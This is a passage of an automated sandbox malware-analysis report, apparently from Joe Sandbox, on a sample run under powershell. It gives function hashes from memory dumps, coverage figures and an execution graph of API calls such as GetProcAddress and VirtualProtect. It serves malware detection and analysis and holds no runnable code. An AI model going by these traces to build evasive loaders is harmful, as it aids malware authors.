                                                                            • Instruction ID: 5d6ca8c3dbf26086ee1beed39e13f74bbae1da362773fc1d97ad7eaea1e77e75
                                                                            • Opcode Fuzzy Hash: 9db64ae188320ad60d0cdd9ca51b1c1b36b756d0284efc743a415ace8ac9a9bc
                                                                            • Instruction Fuzzy Hash: 1AB16D70E00219DFDB10CFA9D88579EBBF2BF88745F148529E815E7294EB74A842CB91
                                                                            Function 04A3F3A4 Relevance: .3, Instructions: 262COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7f5361f267bc9e0725e3564a3180a1c5c214907fd64cc93f19c8a5c01f12106e
                                                                            • Instruction ID: daf955d72837cce8e68ef0702ea6c738ec69a244bb4baf34db11a7d283f88e48
                                                                            • Opcode Fuzzy Hash: 7f5361f267bc9e0725e3564a3180a1c5c214907fd64cc93f19c8a5c01f12106e
                                                                            • Instruction Fuzzy Hash: 8BB14B70E102499FDB10CFA9D88179EBBF1BF48315F148529F815EB2A4EB74A885CB91
                                                                            Function 04A32AA0 Relevance: .2, Instructions: 228COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 205fcf5c8695a4ae41e994fa65b90d64cb7308cfb013c73cf9f307d6bbc29f02
                                                                            • Instruction ID: 024d5bcc5e12728b22430805529cd04e437aec55c93808ef29afedee56896739
                                                                            • Opcode Fuzzy Hash: 205fcf5c8695a4ae41e994fa65b90d64cb7308cfb013c73cf9f307d6bbc29f02
                                                                            • Instruction Fuzzy Hash: 5F919F75A042058FCB05CF59C494AAEFBB1FF48310B24859AE955AB3A1D736FC81CFA0
                                                                            Function 04A37A70 Relevance: .2, Instructions: 192COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6c4498b8af5ac21265afd4de62be2064cc0885e3f0ea2f66cae3ebc6ae63b7b2
                                                                            • Instruction ID: 35d5ea2636b4a4af1b6a01f852405da6f9f01a653e10b12d51ca80143da478c4
                                                                            • Opcode Fuzzy Hash: 6c4498b8af5ac21265afd4de62be2064cc0885e3f0ea2f66cae3ebc6ae63b7b2
                                                                            • Instruction Fuzzy Hash: 2371B074A002089FDB14DF69C880A9DFBF2FF89310F24C56AE416DB650EB70AC46CB90
                                                                            Function 04A37BDE Relevance: .2, Instructions: 188COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2e39305059327e1c877035913c6f48c0cc25c35ef7e7f8cd178c3a7ae8b0026c
                                                                            • Instruction ID: ba34a47c567e7a9d7aec96c36ba1666dbced17896393f3ec43c98cc399c501ae
                                                                            • Opcode Fuzzy Hash: 2e39305059327e1c877035913c6f48c0cc25c35ef7e7f8cd178c3a7ae8b0026c
                                                                            • Instruction Fuzzy Hash: 62715F74A002089FDF24DFA9D490BADBBF2BF88345F14856AE406AB750EB71AD45CF50
                                                                            Function 04A3F128 Relevance: .2, Instructions: 180COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1f760c9a86f98d0d7b6314dec12ae2c4ea0b6739e89073745cad3be6a5ff4c02
                                                                            • Instruction ID: 76796d050ed1296de61830c9a750d9000a49fe6b4771a4b0230d29930faef552
                                                                            • Opcode Fuzzy Hash: 1f760c9a86f98d0d7b6314dec12ae2c4ea0b6739e89073745cad3be6a5ff4c02
                                                                            • Instruction Fuzzy Hash: 1E714A70E10249DFDB10CFA9D8457DEBBF2BF88315F148129F415AB254EB74A842CB91
                                                                            Function 04A3F11E Relevance: .2, Instructions: 180COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 78f6ca0389b998ce09fe7df436d754df621ee050ea2933b9a0ca4f1ecbcc5d5c
                                                                            • Instruction ID: 70b5cac99a0f91f40380196b9832435ec9c961151dedc2fbf8217069832f3617
                                                                            • Opcode Fuzzy Hash: 78f6ca0389b998ce09fe7df436d754df621ee050ea2933b9a0ca4f1ecbcc5d5c
                                                                            • Instruction Fuzzy Hash: B5716BB0E15249DFDB10CFA9D845BDEBBF2BF88315F148129F414AB254EB74A842CB91
                                                                            Function 078C0BA0 Relevance: .2, Instructions: 174COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b25b89e48678de29125f0516ef652c5d048108a5cb45a8774616ca2a2ab19fa4
                                                                            • Instruction ID: d63cc7e972d7b46f32f0121312a4c8e2bf211fb28a3b16b8dc095297d52e1f4d
                                                                            • Opcode Fuzzy Hash: b25b89e48678de29125f0516ef652c5d048108a5cb45a8774616ca2a2ab19fa4
                                                                            • Instruction Fuzzy Hash: 93517BB170435ADFDB21CFA98C0076BBBA6AFD2261F14806FD545DF291CA71D841C7A2
                                                                            Function 04A37801 Relevance: .1, Instructions: 123COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7d84ff3b917b7a53102d919606070e1c894ad5660a7d22514395848aa7b2afc9
                                                                            • Instruction ID: 8900a2d87205eb5e187591ef175dc9e7d328e3006e599af14d98b5284cb7e4ef
                                                                            • Opcode Fuzzy Hash: 7d84ff3b917b7a53102d919606070e1c894ad5660a7d22514395848aa7b2afc9
                                                                            • Instruction Fuzzy Hash: 0E416075B00244DFDB19DB75C4586AABBF2AF8D751F44856CE406EB3A0DB30AD41CB90
                                                                            Function 078C0A28 Relevance: .1, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5af1c7a6c9d6db4d0e4179ffc883d4045bff40b5b44b24f5f2a1dcb8499f48d0
                                                                            • Instruction ID: cf0d4fd58f44c01063a036bd36c0bf3b31ff8da310e82881b51b6b481a9eccff
                                                                            • Opcode Fuzzy Hash: 5af1c7a6c9d6db4d0e4179ffc883d4045bff40b5b44b24f5f2a1dcb8499f48d0
                                                                            • Instruction Fuzzy Hash: E03148B1B00219DFEB14DEBACC003AEB7A5AF94254F24853EC915EB341EB71D941CBA1
                                                                            Function 04A37A5B Relevance: .1, Instructions: 119COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2864eaa9c4136d6f6a99ece9ecc86576379f1ac2dbf96db866f0d74e1774c988
                                                                            • Instruction ID: 0b892b8b9337e88a8f56b4403b1b54cf5f2534b1072bb248872d8ae1f480e6a4
                                                                            • Opcode Fuzzy Hash: 2864eaa9c4136d6f6a99ece9ecc86576379f1ac2dbf96db866f0d74e1774c988
                                                                            • Instruction Fuzzy Hash: F8417274A00208DFDB18DFA9C89469DFBF2BF88350F14856DD006AB754EB70AC85CB51
                                                                            Function 04A32BB0 Relevance: .1, Instructions: 112COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eea9bc2a3eac9530f6e458e2c842353d9dcfe580543bdac133ba377f1e0543be
                                                                            • Instruction ID: 0e3493183702c699cad3387aef37b0a8243666ed01d4fa87e405088357a0f3df
                                                                            • Opcode Fuzzy Hash: eea9bc2a3eac9530f6e458e2c842353d9dcfe580543bdac133ba377f1e0543be
                                                                            • Instruction Fuzzy Hash: 2F414875A002058FCB05CF59C494AAAFBB1FF48310B1185A9E905AB3A4D732FC91CFA0
                                                                            Function 078C0F08 Relevance: .1, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b3dbd7cf0a293652cfe3b7ddde340faea2888e4b8326bdb2e8aca7628a8d63e4
                                                                            • Instruction ID: dfa53de4c91ef30942d38b3ccdc1109e78d3eb021f28f4b7e7c3a973f5937131
                                                                            • Opcode Fuzzy Hash: b3dbd7cf0a293652cfe3b7ddde340faea2888e4b8326bdb2e8aca7628a8d63e4
                                                                            • Instruction Fuzzy Hash: CE2181B1310316EBE7249AB54C4073B76CE9BD4745F20843E9605DB3C1DD75D8C18360
                                                                            Function 04A3BCA0 Relevance: .1, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: be8628b32892f67d819d077485577ef4416002e747868b3f291ed18fe915ba82
                                                                            • Instruction ID: 1b3b0b6b848c67c0acea5fe2d2f30d36504ef9aae19ecad16b2f57c0818ccd50
                                                                            • Opcode Fuzzy Hash: be8628b32892f67d819d077485577ef4416002e747868b3f291ed18fe915ba82
                                                                            • Instruction Fuzzy Hash: B8314B30B012188FCB26DB64C8516EEB7B2BF99305F1044E9D409AB351DB35EE96CF90
                                                                            Function 078C0EED Relevance: .1, Instructions: 83COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 143d98df4da58884bb455d869ff32adfdb267b0b643f9c5a7d14a00de6c8f47a
                                                                            • Instruction ID: 813fd30326a96f90685a6f1317983b95c8e1cf1282112d2dad54b80ce69a3b05
                                                                            • Opcode Fuzzy Hash: 143d98df4da58884bb455d869ff32adfdb267b0b643f9c5a7d14a00de6c8f47a
                                                                            • Instruction Fuzzy Hash: 4C21A9B1318386ABE7604A764C407B23FAA9F92340F24406EA640DB3C3DA79E9C4C371
                                                                            Function 078C0D75 Relevance: .1, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 029954ff25b75b2398f5a1b410022ef8fa9d12e3330b0527fb77a8c79823781b
                                                                            • Instruction ID: a5c396bd6c8234d843f5834e003cb7f1e4134ece4ea2d5d26dd16d050b9470ec
                                                                            • Opcode Fuzzy Hash: 029954ff25b75b2398f5a1b410022ef8fa9d12e3330b0527fb77a8c79823781b
                                                                            • Instruction Fuzzy Hash: AA01687220C384DFC7028A68AC105B67F749FD3560B0981AFE640CB197C136E889C3B1
                                                                            Function 04A3EDCB Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 985d6a02e6c0e3081163e24d419359914888ca3b1b24e7667b76f1d730a4dd49
                                                                            • Instruction ID: 4317a157b628a2a1fd44913d49fc828a48d4e7567c7a31cb43ed7329cd1b96bb
                                                                            • Opcode Fuzzy Hash: 985d6a02e6c0e3081163e24d419359914888ca3b1b24e7667b76f1d730a4dd49
                                                                            • Instruction Fuzzy Hash: D511A430D00249EFEF24DF98D5987EDB7B2AB4535EF24542AE001B6190EB74788ACB15
                                                                            Function 04A395C3 Relevance: .0, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1571d0c7e78f9ae67dfeb9bbbf9756ab6fdf2235bfc1bb435cc14b2af212f6ef
                                                                            • Instruction ID: 3034c796f0a84d3346462e55fa15eaea445f38913f851a94771e6ad8081189f1
                                                                            • Opcode Fuzzy Hash: 1571d0c7e78f9ae67dfeb9bbbf9756ab6fdf2235bfc1bb435cc14b2af212f6ef
                                                                            • Instruction Fuzzy Hash: 53014FB8A002149FDB00DB98D490AAAF771FF8D310B248259D95AAB321DA36EC438B50
                                                                            Function 04A3958C Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f6222239473de5e65acfd0d03abf52b5ebae1a111282ce5dafc1abb8ee8ef42f
                                                                            • Instruction ID: 4684798f6010052b4ed17ae9dad4f8c01555abd3274c7f50c38e9bf4b11b5e51
                                                                            • Opcode Fuzzy Hash: f6222239473de5e65acfd0d03abf52b5ebae1a111282ce5dafc1abb8ee8ef42f
                                                                            • Instruction Fuzzy Hash: CBF0F474708244CBC701C758D8907AEFB71EFC8210F14809AD4459B392DB72A842C791
                                                                            Function 078C87A6 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 60e988c3bb450b44abedaf21fca7a08963bbb3c881b89f6434ebe4ac44a30b71
                                                                            • Instruction ID: e74bdfa0d5f49e92cfd97fa229c906cc72fed0a5563908c6eefce0bddca78ba5
                                                                            • Opcode Fuzzy Hash: 60e988c3bb450b44abedaf21fca7a08963bbb3c881b89f6434ebe4ac44a30b71
                                                                            • Instruction Fuzzy Hash: 89F059F2B802145BD32055681802295B3678BE9674F040A7FC921DBB81E531EC8283A1
                                                                            Function 04A32D35 Relevance: .0, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c8ec2713af3c816d49c1eeca36bda528a58168ebac2664d9bbe03d1f140a3c07
                                                                            • Instruction ID: 0639289897724c1ca49639eeb80ae2013a1f95fbc4ace0e81d85bad4fb952e33
                                                                            • Opcode Fuzzy Hash: c8ec2713af3c816d49c1eeca36bda528a58168ebac2664d9bbe03d1f140a3c07
                                                                            • Instruction Fuzzy Hash: 6EF0E93A6093848FD702C758DC60ADDFB70EF4622471941E7D554DB2A3D627AC56CB21

                                                                            Execution Graph

                                                                            Execution Coverage:2.6%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:1.3%
                                                                            Total number of Nodes:1661
                                                                            Total number of Limit Nodes:5
                                                                            execution_graph 7221 232321a1 ___scrt_dllmain_exception_filter 7222 232381a0 7223 232381d9 7222->7223 7224 232381dd 7223->7224 7235 23238205 7223->7235 7225 23236368 _free 20 API calls 7224->7225 7227 232381e2 7225->7227 7226 23238529 7228 23232ada _ValidateLocalCookies 5 API calls 7226->7228 7229 232362ac _abort 26 API calls 7227->7229 7230 23238536 7228->7230 7231 232381ed 7229->7231 7232 23232ada _ValidateLocalCookies 5 API calls 7231->7232 7234 232381f9 7232->7234 7235->7226 7236 232380c0 7235->7236 7239 232380db 7236->7239 7237 23232ada _ValidateLocalCookies 5 API calls 7238 23238152 7237->7238 7238->7235 7239->7237 7493 2323a1e0 7496 2323a1fe 7493->7496 7495 2323a1f6 7499 2323a203 7496->7499 7497 2323aa53 21 API calls 7500 2323a42f 7497->7500 7498 2323a298 7498->7495 7499->7497 7499->7498 7500->7495 5832 2323c7a7 5833 2323c7be 5832->5833 5842 2323c82c 5832->5842 5833->5842 5844 2323c7e6 GetModuleHandleA 5833->5844 5834 2323c872 5835 2323c835 GetModuleHandleA 5837 2323c83f 5835->5837 5838 2323c85f GetProcAddress 5837->5838 5837->5842 5838->5842 5839 2323c7dd 5839->5837 5840 2323c800 GetProcAddress 5839->5840 5839->5842 5841 2323c80d VirtualProtect 5840->5841 5840->5842 5841->5842 5843 2323c81c VirtualProtect 5841->5843 5842->5834 5842->5835 5842->5837 5843->5842 5845 2323c7ef 5844->5845 5851 2323c82c 5844->5851 5856 2323c803 GetProcAddress 5845->5856 5847 2323c7f4 5850 2323c800 GetProcAddress 5847->5850 5847->5851 5848 2323c872 5849 2323c835 GetModuleHandleA 5855 2323c83f 5849->5855 5850->5851 5852 2323c80d VirtualProtect 5850->5852 5851->5848 5851->5849 5851->5855 5852->5851 5853 2323c81c VirtualProtect 5852->5853 5853->5851 5854 2323c85f GetProcAddress 5854->5851 5855->5851 5855->5854 5857 2323c82c 5856->5857 5858 2323c80d VirtualProtect 5856->5858 5860 2323c872 5857->5860 5861 2323c835 GetModuleHandleA 5857->5861 5858->5857 5859 2323c81c VirtualProtect 5858->5859 5859->5857 5863 2323c83f 5861->5863 5862 2323c85f GetProcAddress 5862->5863 5863->5857 5863->5862 6090 2323742b 6093 23237430 6090->6093 6092 23237453 6093->6092 6094 23238bae 6093->6094 6095 23238bdd 6094->6095 6096 23238bbb 6094->6096 6095->6093 6097 23238bd7 6096->6097 6098 23238bc9 RtlDeleteCriticalSection 6096->6098 6099 2323571e _free 20 API calls 6097->6099 6098->6097 6098->6098 6099->6095 6518 2323ac6b 6519 2323ac84 __startOneArgErrorHandling 6518->6519 6520 2323acad __startOneArgErrorHandling 6519->6520 6522 2323b2f0 6519->6522 6523 2323b329 __startOneArgErrorHandling 6522->6523 6526 2323b350 __startOneArgErrorHandling 6523->6526 6533 2323b5c1 6523->6533 6525 2323b393 6546 2323b8b2 6525->6546 6526->6525 6528 2323b36e 6526->6528 6537 2323b8e1 6528->6537 6530 2323b38e __startOneArgErrorHandling 6531 23232ada _ValidateLocalCookies 5 API calls 6530->6531 6532 2323b3b7 6531->6532 6532->6520 6534 2323b5ec __raise_exc 6533->6534 6535 2323b7e5 RaiseException 6534->6535 6536 2323b7fd 6535->6536 6536->6526 6538 2323b8f0 6537->6538 6539 2323b964 __startOneArgErrorHandling 6538->6539 6540 2323b90f __startOneArgErrorHandling 6538->6540 6541 2323b8b2 __startOneArgErrorHandling 20 API calls 6539->6541 6553 232378a3 6540->6553 6543 2323b95d 6541->6543 6543->6530 6545 2323b8b2 __startOneArgErrorHandling 20 API calls 6545->6543 6547 2323b8d4 6546->6547 6548 2323b8bf 6546->6548 6550 23236368 _free 20 API calls 6547->6550 6549 2323b8d9 6548->6549 6551 23236368 _free 20 API calls 6548->6551 6549->6530 6550->6549 6552 2323b8cc 6551->6552 6552->6530 6554 232378cb 6553->6554 6555 23232ada _ValidateLocalCookies 5 API calls 6554->6555 6556 232378e8 6555->6556 6556->6543 6556->6545 6557 2323506f 6558 23235081 6557->6558 6559 23235087 6557->6559 6560 23235000 20 API calls 6558->6560 6560->6559 7240 232360ac 7241 232360b7 7240->7241 7243 232360dd 7240->7243 7242 232360c7 FreeLibrary 7241->7242 7241->7243 7242->7241 7244 23233eb3 7247 23235411 7244->7247 7248 2323541d _abort 7247->7248 7249 23235af6 _abort 38 API calls 7248->7249 7252 23235422 7249->7252 7250 232355a8 _abort 38 API calls 7251 2323544c 7250->7251 7252->7250 6561 23239e71 6562 23239e95 6561->6562 6563 2323ac6b __startOneArgErrorHandling 6562->6563 6564 23239eae 6562->6564 6567 2323b2f0 21 API calls 6563->6567 6568 2323acad __startOneArgErrorHandling 6563->6568 6566 23239ef8 6564->6566 6569 2323aa53 6564->6569 6567->6568 6570 2323aa70 RtlDecodePointer 6569->6570 6572 2323aa80 6569->6572 6570->6572 6571 23232ada _ValidateLocalCookies 5 API calls 6574 2323ac67 6571->6574 6573 2323ab0d 6572->6573 6575 2323ab02 6572->6575 6577 2323aab7 6572->6577 6573->6575 6576 23236368 _free 20 API calls 6573->6576 6574->6566 6575->6571 6576->6575 6577->6575 6578 23236368 _free 20 API calls 6577->6578 6578->6575 6100 23235630 6103 2323563b 6100->6103 6102 23235664 6113 23235688 6102->6113 6103->6102 6104 23235660 6103->6104 6106 23235eb7 6103->6106 6107 23235c45 _abort 5 API calls 6106->6107 6108 23235ede 6107->6108 6109 23235efc InitializeCriticalSectionAndSpinCount 6108->6109 6112 23235ee7 6108->6112 6109->6112 6110 23232ada _ValidateLocalCookies 5 API calls 6111 23235f13 6110->6111 6111->6103 6112->6110 6114 232356b4 6113->6114 6115 23235695 6113->6115 6114->6104 6116 2323569f RtlDeleteCriticalSection 6115->6116 6116->6114 6116->6116 6579 23233370 6590 23233330 6579->6590 6591 23233342 6590->6591 6592 2323334f 6590->6592 6593 23232ada _ValidateLocalCookies 5 API calls 6591->6593 6593->6592 7501 232363f0 7502 23236400 7501->7502 7511 23236416 7501->7511 7503 23236368 _free 20 API calls 7502->7503 7504 23236405 7503->7504 7505 232362ac _abort 26 API calls 7504->7505 7507 2323640f 7505->7507 7508 23236480 7508->7508 7531 23234e76 7508->7531 7510 232364ee 7512 2323571e _free 20 API calls 7510->7512 7511->7508 7514 23236561 7511->7514 7520 23236580 7511->7520 7512->7514 7513 232364e5 7513->7510 7517 23236573 7513->7517 7537 232385eb 7513->7537 7546 2323679a 7514->7546 7518 232362bc _abort 11 API calls 7517->7518 7519 2323657f 7518->7519 7521 2323658c 7520->7521 7521->7521 7522 2323637b _abort 20 API calls 7521->7522 7523 232365ba 7522->7523 7524 232385eb 26 API calls 7523->7524 7525 232365e6 7524->7525 7526 232362bc _abort 11 API calls 7525->7526 7527 23236615 ___scrt_fastfail 7526->7527 7528 232366b6 FindFirstFileExA 7527->7528 7529 23236705 7528->7529 7530 23236580 26 API calls 7529->7530 7532 23234e87 7531->7532 7533 23234e8b 7531->7533 7532->7513 7533->7532 7534 2323637b _abort 20 API calls 7533->7534 7535 23234eb9 7534->7535 7536 2323571e _free 20 API calls 7535->7536 7536->7532 7540 2323853a 7537->7540 7538 2323854f 7539 23238554 7538->7539 7541 23236368 _free 20 API calls 7538->7541 7539->7513 7540->7538 7540->7539 7544 2323858b 7540->7544 7542 2323857a 7541->7542 7543 232362ac _abort 26 API calls 7542->7543 7543->7539 7544->7539 7545 23236368 _free 20 API calls 7544->7545 7545->7542 7550 232367a4 7546->7550 7547 232367b4 7549 2323571e _free 20 API calls 7547->7549 7548 2323571e _free 20 API calls 7548->7550 7551 232367bb 7549->7551 7550->7547 7550->7548 7551->7507 7257 23239db8 7259 23239dbf 7257->7259 7258 23239e20 7260 2323a90e 7258->7260 7261 2323aa17 21 API calls 7258->7261 7259->7258 7263 23239ddf 7259->7263 7262 23239e6e 7261->7262 7263->7260 7264 2323aa17 21 API calls 7263->7264 7265 2323a93e 7264->7265 6117 23231f3f 6118 23231f4b ___DestructExceptionObject 6117->6118 6135 2323247c 6118->6135 6120 23231f52 6121 23232041 6120->6121 6122 23231f7c 6120->6122 6129 23231f57 ___scrt_is_nonwritable_in_current_image 6120->6129 6162 23232639 IsProcessorFeaturePresent 6121->6162 6146 232323de 6122->6146 6125 23232048 6126 23231f8b __RTC_Initialize 6126->6129 6149 232322fc RtlInitializeSListHead 6126->6149 6128 23231f99 ___scrt_initialize_default_local_stdio_options 6150 232346c5 6128->6150 6133 23231fb8 6133->6129 6158 23234669 6133->6158 6136 23232485 6135->6136 6166 23232933 IsProcessorFeaturePresent 6136->6166 6140 23232496 6141 2323249a 6140->6141 6177 232353c8 6140->6177 6141->6120 6144 232324b1 6144->6120 6251 232324b5 6146->6251 6148 232323e5 6148->6126 6149->6128 6152 232346dc 6150->6152 6151 23232ada _ValidateLocalCookies 5 API calls 6153 23231fad 6151->6153 6152->6151 6153->6129 6154 232323b3 6153->6154 6155 232323b8 ___scrt_release_startup_lock 6154->6155 6156 23232933 ___isa_available_init IsProcessorFeaturePresent 6155->6156 6157 232323c1 6155->6157 6156->6157 6157->6133 6160 23234698 6158->6160 6159 23232ada _ValidateLocalCookies 5 API calls 6161 232346c1 6159->6161 6160->6159 6161->6129 6163 2323264e ___scrt_fastfail 6162->6163 6164 232326f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6163->6164 6165 23232744 ___scrt_fastfail 6164->6165 6165->6125 6167 23232491 6166->6167 6168 232334ea 6167->6168 6169 232334ef ___vcrt_initialize_winapi_thunks 6168->6169 6188 23233936 6169->6188 6173 23233505 6174 23233510 6173->6174 6202 23233972 6173->6202 6174->6140 6176 232334fd 6176->6140 6243 23237457 6177->6243 6180 23233529 6181 23233532 6180->6181 6187 23233543 6180->6187 6182 2323391b ___vcrt_uninitialize_ptd 6 API calls 6181->6182 6183 23233537 6182->6183 6184 23233972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6183->6184 6185 2323353c 6184->6185 6247 23233c50 6185->6247 6187->6141 6189 2323393f 